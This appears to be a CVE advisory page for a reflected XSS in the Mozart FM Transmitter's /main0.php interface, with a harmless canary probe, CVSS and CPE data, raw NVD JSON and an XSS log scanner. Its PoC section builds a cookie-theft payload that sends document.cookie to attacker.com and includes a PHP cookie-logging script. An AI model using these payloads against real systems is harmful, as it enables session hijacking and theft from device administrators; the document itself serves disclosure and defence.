Security Vulnerability Report
CVE-2025-63229 CVSS 5.4 MEDIUM

Published: 2025-11-18 22:15:52
Last Modified: 2025-12-06 00:18:19

Description

The Mozart FM Transmitter web management interface, version WEBMOZZI-00287, contains a reflected Cross-Site Scripting (XSS) vulnerability in the /main0.php endpoint. The value of the ?m= query parameter is echoed into the page without output encoding, so an attacker who gets a victim to open a crafted link can execute arbitrary JavaScript in the victim's browser, in the origin of the management interface. That script can read data the page exposes, perform actions the interface allows on the victim's behalf, and exfiltrate the session cookie if it is not marked HttpOnly. Exploitation requires user interaction (the victim must follow the link), which is reflected in the CVSS vector below.
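A safe way to confirm the reflection without running a cookie-stealing payload, as an added example that is not part of the advisory: send a unique, harmless canary in ?m= and check whether it comes back verbatim or entity-encoded. The two handler functions are constructed stand-ins for the unpatched and a hardened /main0.php (the real page's HTML is not on this page); the hardened one applies the same encoding PHP's htmlspecialchars($m, ENT_QUOTES, 'UTF-8') would. check_live() is the only part that touches the network; the offline demo never calls it.

```python
import html
import secrets
import urllib.parse
import urllib.request


def vulnerable_main0(m: str) -> str:
    """Constructed stand-in for the unpatched /main0.php: the ?m= value is
    echoed into the HTML body unchanged (the surrounding markup is assumed)."""
    return f"<html><body><h1>Mozart</h1><div class='msg'>{m}</div></body></html>"


def hardened_main0(m: str) -> str:
    """Same page with output encoding. html.escape(quote=True) encodes < > & " '
    which is the character set PHP's htmlspecialchars(..., ENT_QUOTES) encodes."""
    return f"<html><body><h1>Mozart</h1><div class='msg'>{html.escape(m, quote=True)}</div></body></html>"


def make_canary() -> str:
    """Harmless probe: a random token wrapped in the characters that output
    encoding must neutralise. Nothing executes if it is reflected raw; it only
    proves the reflection context is injectable."""
    return f'zq<"\'>{secrets.token_hex(4)}zq'


def probe_url(base: str, canary: str) -> str:
    """Build the /main0.php?m=<canary> URL with proper query-string encoding."""
    return base.rstrip("/") + "/main0.php?" + urllib.parse.urlencode({"m": canary})


def classify_reflection(body: str, canary: str) -> str:
    """'unescaped': canary came back verbatim (XSS-prone),
    'encoded': it came back entity-encoded, 'absent': not reflected at all."""
    if canary in body:
        return "unescaped"
    if html.escape(canary, quote=True) in body:
        return "encoded"
    return "absent"


def check_live(base: str, timeout: float = 5.0) -> str:
    """Network probe against a host you are authorised to test (hypothetical
    base URL such as http://192.0.2.10). Not exercised by the offline demo."""
    canary = make_canary()
    with urllib.request.urlopen(probe_url(base, canary), timeout=timeout) as resp:
        body = resp.read().decode("utf-8", "replace")
    return classify_reflection(body, canary)


if __name__ == "__main__":
    c = make_canary()
    print("probe URL :", probe_url("http://192.0.2.10", c))
    print("unpatched :", classify_reflection(vulnerable_main0(c), c))  # unescaped
    print("hardened  :", classify_reflection(hardened_main0(c), c))    # encoded
```

A verbatim reflection of the canary is enough to call the parameter injectable; the alert(document.domain) payload from the PoC below is only needed if a screenshot of execution is required for the report.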

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:* - NOT VULNERABLE
Mozart FM Transmitter WEBMOZZI-00287 (version unknown)

Each pair above is one AND configuration in the NVD record: the firmware CPE is the vulnerable component and the hardware CPE is the platform it runs on, so "NOT VULNERABLE" on a mozart_next_* hardware entry does not mean that model is safe. No fixed version is listed, and the raw NVD data below is truncated, so the set of models may be incomplete.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-63229 PoC - Mozart FM Transmitter Reflected XSS -->
<!-- Target: Mozart FM Transmitter WEBMOZZI-00287 -->
<!-- Endpoint: /main0.php -->
<!-- Attack Vector: ?m= parameter -->
<!-- Basic XSS PoC - Cookie Theft -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2025-63229 PoC</title>
</head>
<body>
  <h2>CVE-2025-63229 - Mozart FM Transmitter XSS</h2>

  <!-- Malicious URL -->
  <p>Attack URL:</p>
  <code id="maliciousUrl"></code>
  <script>
    // Generate the malicious URL for the target host entered by the tester.
    var targetHost = prompt("Enter target host (e.g., http://192.168.1.100):", "http://192.168.1.100");

    // The payload is one literal string: document.cookie must be read in the
    // victim's browser when the transmitter page executes it, not here in the
    // PoC page. The closing </script> tag is split so the HTML parser does not
    // terminate this script block early.
    var maliciousPayload =
      '<script>document.location="http://attacker.com/steal?c="+encodeURIComponent(document.cookie)</scr' + 'ipt>';
    var maliciousUrl = targetHost + '/main0.php?m=' + encodeURIComponent(maliciousPayload);
    document.getElementById('maliciousUrl').innerText = maliciousUrl;

    // Display a link for testing.
    document.write('<br><a href="' + maliciousUrl + '" target="_blank">Click to test (simulated)</a>');
  </script>

  <!-- Simulated Attack Request -->
  <h3>Attack Request:</h3>
  <pre id="attackRequest"></pre>
  <script>
    // Show the raw request format with a harmless alert() payload.
    var requestText =
      'GET /main0.php?m=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n' +
      'Host: target-server\n' +
      'User-Agent: Mozilla/5.0\n' +
      'Accept: text/html\n';
    document.getElementById('attackRequest').innerText = requestText;
  </script>

  <!-- Stealer Script (attacker-controlled server). The PHP tags are entity-encoded
       so the browser shows the source instead of swallowing it as a bogus comment. -->
  <h3>Cookie Stealer (steal.php):</h3>
  <pre>
&lt;?php
if (isset($_GET['c'])) {
    $cookie = $_GET['c'];
    $ip     = $_SERVER['REMOTE_ADDR'];
    $date   = date('Y-m-d H:i:s');

    // Log stolen cookie
    $log = fopen("cookies.txt", "a");
    fwrite($log, "IP: $ip | Date: $date | Cookie: $cookie\n");
    fclose($log);

    // Redirect to legitimate site
    header("Location: http://target/main0.php");
}
?&gt;
  </pre>
</body>
</html>
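For the defensive side, an added example that is not from the advisory or the vendor: a scanner that reads web-server access logs and flags requests to /main0.php whose m= value carries script-injection markers, including the request shown in the PoC above. It assumes combined log format (the page does not say what the Mozart interface logs), decodes the parameter repeatedly to catch double URL-encoding, and uses deliberately loose markers that you would tune for real traffic. The log lines are constructed; the addresses are from the RFC 5737 documentation ranges.

```python
import re
import urllib.parse

# Combined log format (assumed); only the fields the scanner needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Loose markers for reflected-XSS payloads: script tags, javascript: URLs,
# on*= event handlers and the usual tag carriers. Expect false positives on
# words such as "once=" and tighten for your own traffic.
XSS_MARKERS = re.compile(
    r'<\s*script\b|javascript\s*:|\bon[a-z]+\s*=|<\s*(?:img|svg|iframe|body|object|embed)\b',
    re.IGNORECASE,
)

# Constructed sample lines: two attack attempts (one double-encoded), a benign
# request to the same endpoint, and an attack against a different path.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Nov/2025:22:16:01 +0000] "GET /main0.php?m=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 1432 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Nov/2025:22:16:05 +0000] "GET /main0.php?m=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 1440 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [18/Nov/2025:22:17:10 +0000] "GET /main0.php?m=status HTTP/1.1" 200 1401 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [18/Nov/2025:22:17:12 +0000] "GET /index.php?m=%3Cscript%3E HTTP/1.1" 404 210 "-" "curl/8.0"',
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated URL encoding (%253C -> %3C -> <) until the string stops changing."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_m_param(target: str):
    """Return the decoded m= payload when the request targets /main0.php and the
    value matches an XSS marker; otherwise None."""
    parts = urllib.parse.urlsplit(target)
    if not parts.path.endswith("/main0.php"):
        return None
    # parse_qs already decodes one layer; fully_decode strips any further layers.
    for value in urllib.parse.parse_qs(parts.query, keep_blank_values=True).get("m", []):
        decoded = fully_decode(value)
        if XSS_MARKERS.search(decoded):
            return decoded
    return None


def scan(lines):
    """Return one hit record per log line carrying a suspicious m= value."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        payload = suspicious_m_param(match.group("target"))
        if payload is not None:
            hits.append({
                "ip": match.group("ip"),
                "ts": match.group("ts"),
                "status": int(match.group("status")),
                "payload": payload,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} -> {hit['status']} m={hit['payload']!r}")
```

A 200 on a flagged request only shows the payload was reflected, not that anyone executed it; the victim's browser is the one that fetches the exfiltration URL, so the corresponding evidence of a successful attack is an outbound request from a user's workstation, not a line in the transmitter's log.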

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63229", "sourceIdentifier": "[email protected]", "published": "2025-11-18T22:15:51.880", "lastModified": "2025-12-06T00:18:19.227", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Mozart FM Transmitter web management interface on version WEBMOZZI-00287, contains a reflected Cross-Site Scripting (XSS) vulnerability in the /main0.php endpoint. By injecting a malicious JavaScript payload into the ?m= query parameter, an attacker can execute arbitrary code in the victim's browser, potentially stealing sensitive information, hijacking sessions, or performing unauthorized actions."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2B25533-2EF5-4158-9505-1CD18463DB68"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_100:-:*:*:*:*:*:*:*", "matchCriteriaId": "7834E460-78EE-456A-84F7-0DECE004BD80"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_1000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"A3497F7E-0433-444B-A58A-A795C8833966"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_1000:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDEB3E77-E3D8-4878-BBE3-74530F3469B4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_2000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "A975C91C-59BD-44AC-9F67-0682CE173738"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_2000:-:*:*:*:*:*:*:*", "matchCriteriaId": "F30F6688-FCDA-4BA5-ABD9-0EB91CDF7631"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_30_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7B57D15-6192-4D68-9CC5-726E052E7DDD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_30:-:*:*:*:*:*:*:*", "matchCriteriaId": "EA1C3BA1-3E25-474B-B2A4-97136D6287BA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_300_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F0130D6C-CE17-4046-B0EB-0AD2DA7DC6AC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_300:-:*:*:*:*:*:*:*", "matchCriteriaId": "A04E5386-2B8E-4E5E-9766-CEA4887265D4"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3000_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9F5D088-18AE-4388-83D7-66EBF03B3091"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3000:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"E5427DF7-CBAB-4BB9-9175-B7EC7012EAD0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_3500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "285B4AB4-1F69-445E-B2D3-A0C140B55990"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_3500:-:*:*:*:*:*:*:*", "matchCriteriaId": "90E84970-55F7-41CB-814E-085BACFAAA91"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dbbroadcast:mozart_next_50_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "9CD961FB-E86A-4346-9B8D-3658C7BD818F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dbbroadcast:mozart_next_50:-:*:*:*:*:*:*:*", "matchCriteriaId": "56699CC2-C823-4397-8C76-BC165E48D6E0"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3 ... (truncated)